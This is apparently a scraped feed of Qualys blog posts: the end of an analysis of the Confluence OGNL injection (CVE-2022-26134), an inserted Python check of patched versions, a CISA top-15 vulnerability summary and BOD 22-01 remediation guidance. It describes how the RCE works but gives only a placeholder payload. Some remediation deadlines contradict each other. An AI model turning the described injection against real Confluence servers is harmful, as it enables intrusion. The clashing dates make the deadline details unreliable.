characters.\n\nNext line `final Matcher m = p.matcher(expression);` uses matcher() method to search for the pattern in a string, for example : `${qualys.rce.payload}` pattern is created. 
\n\nThe capturing group (the part of the regex in round brackets) extracts the text between `${` and `}`; `final String g = m.group(1);` retrieves it and `final Object o = stack.findValue(g);` passes it on.\n\nFinally, [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) finds the value by evaluating the given expression against the stack in the default search order.\n\nAs a result, when a remote attacker requests the malicious URI `http://127.0.0.1:8090/${rce_payload}/`, `${rce_payload}` first becomes the action namespace; `TextParseUtil.translateVariables` then extracts `rce_payload` from it, and `findValue` evaluates it as an OGNL expression, resulting in remote code execution.\n\n## Detecting the Vulnerability with Qualys WAS\n\nCustomers can detect this vulnerability on the target Confluence application with Qualys Web Application Scanning using the following QID:\n\n * 150523: Atlassian Confluence Server and Data Center OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)\n\n\n### Qualys WAS Report\n\nOnce the vulnerability is successfully detected, users will see the following results in the vulnerability scan report:\n\n\n\n## Solution\n\nDue to the critical severity and active exploitation of this vulnerability, organizations using the Confluence application are strongly advised to upgrade their Confluence application to version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or a later version to remediate CVE-2022-26134. 
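The fixed versions above are per release branch, and a version check that compares against a single minimum version gets it wrong: 7.15.0 is numerically above 7.14.3 yet still vulnerable, and 7.12.x has no fix at all and must move to a fixed branch. The following added example (not Qualys or Atlassian code) encodes the branch table from this section in Python and triages a constructed host inventory. Two readings are assumptions drawn from the text rather than statements of the advisory itself: that anything above 7.18.1 is covered by the "or later" wording, and that a branch without a listed fix should be moved to the latest listed fix; the hostnames and versions in the inventory are made up for the example.

```python
from __future__ import annotations

import re

# Fixed versions named above, keyed by (major, minor) release branch.
FIXED_VERSIONS: dict[tuple[int, int], tuple[int, int, int]] = {
    (7, 4): (7, 4, 17),
    (7, 13): (7, 13, 7),
    (7, 14): (7, 14, 3),
    (7, 15): (7, 15, 2),
    (7, 16): (7, 16, 4),
    (7, 17): (7, 17, 4),
    (7, 18): (7, 18, 1),
}
LATEST_FIX = max(FIXED_VERSIONS.values())  # (7, 18, 1): "... 7.18.1 or later" (assumed reading)
FIRST_AFFECTED = (1, 3, 0)                 # advisory: versions after 1.3.0 are affected

VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> tuple[int, int, int]:
    """'7.13.6', '7.13.6-build1' or ' 7.13.6 ' -> (7, 13, 6); anything else raises."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised Confluence version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def recommended_fix(version: str) -> tuple[int, int, int] | None:
    """The version to upgrade to, or None if this version is already fixed
    (or predates the affected range).

    Branch rules, from the solution text above plus the two assumed readings
    named in the lead-in:
      * a branch with a listed fix is safe from that patch level upwards;
      * a branch with no listed fix (for example 7.12.x) has no patch and must
        move to a fixed branch, so the latest listed fix is recommended;
      * anything above 7.18.1 is treated as covered by "or later".
    """
    v = parse_version(version)
    if v <= FIRST_AFFECTED:
        return None
    branch_fix = FIXED_VERSIONS.get(v[:2])
    if branch_fix is not None:
        return None if v >= branch_fix else branch_fix
    return None if v >= LATEST_FIX else LATEST_FIX


def is_vulnerable(version: str) -> bool:
    return recommended_fix(version) is not None


def triage_inventory(inventory: dict[str, str]) -> dict[str, str]:
    """host -> 'ok' or 'upgrade to X.Y.Z' for a {host: version} mapping."""
    report: dict[str, str] = {}
    for host, version in inventory.items():
        fix = recommended_fix(version)
        report[host] = "ok" if fix is None else "upgrade to {}.{}.{}".format(*fix)
    return report


# Constructed inventory for the example (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "wiki-prod-1": "7.13.6",   # branch has a fix, this is below it
    "wiki-prod-2": "7.13.7",   # exactly the branch fix
    "wiki-stage": "7.15.0",    # above 7.14.3 but below its own branch fix
    "wiki-legacy": "7.12.5",   # branch with no listed fix
    "wiki-new": "7.19.0",      # later than 7.18.1
}

if __name__ == "__main__":
    for host, verdict in triage_inventory(SAMPLE_INVENTORY).items():
        print(f"{host:12} {SAMPLE_INVENTORY[host]:8} {verdict}")
```

The branch lookup is the whole point: `wiki-stage` on 7.15.0 would pass a naive `version >= 7.14.3` test and still be exploitable, and `wiki-legacy` on 7.12.5 cannot be patched in place at all.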
For more information on patching and workarounds, refer to the [Confluence Security Advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>).\n\n## Credits\n\n**Confluence Security Advisory:** <https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>\n\n**CVE Details:**\n\n * <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>\n * <https://nvd.nist.gov/vuln/detail/CVE-2022-26134>\n\nCredit for the vulnerability discovery goes to [Volexity](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>).\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1533805332409069568/photo/1>\n\n### Contributors\n\n * **Sheela Sarva**, Director, Quality Engineering, Web Application Security, Qualys\n * **Rajesh Kumbhar**, Senior Software Engineer, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-29T20:23:28", "type": "qualysblog", "title": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-29T20:23:28", "id": "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. 
For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| 
[ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. 
It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4j and were vulnerable to Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n#### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and escalate privileges.\n\n#### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 
2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities, which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities by severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. 
The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. 
Qualys' guidance for rapid response to the Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. 
Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-202
1-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. 
Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[`CVE-2021-1732`,`CVE-2020-1350`,`CVE-2020-1472`,`CVE-2021-26855`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2020-0601`,`CVE-2021-26857`,`CVE-2021-22893`,`CVE-2020-8243`,`CVE-2021-22900`,`CVE-2021-22894`,`CVE-2020-8260`,`CVE-2021-22899`,`CVE-2019-11510`]\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help: the Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but only partial step in threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": 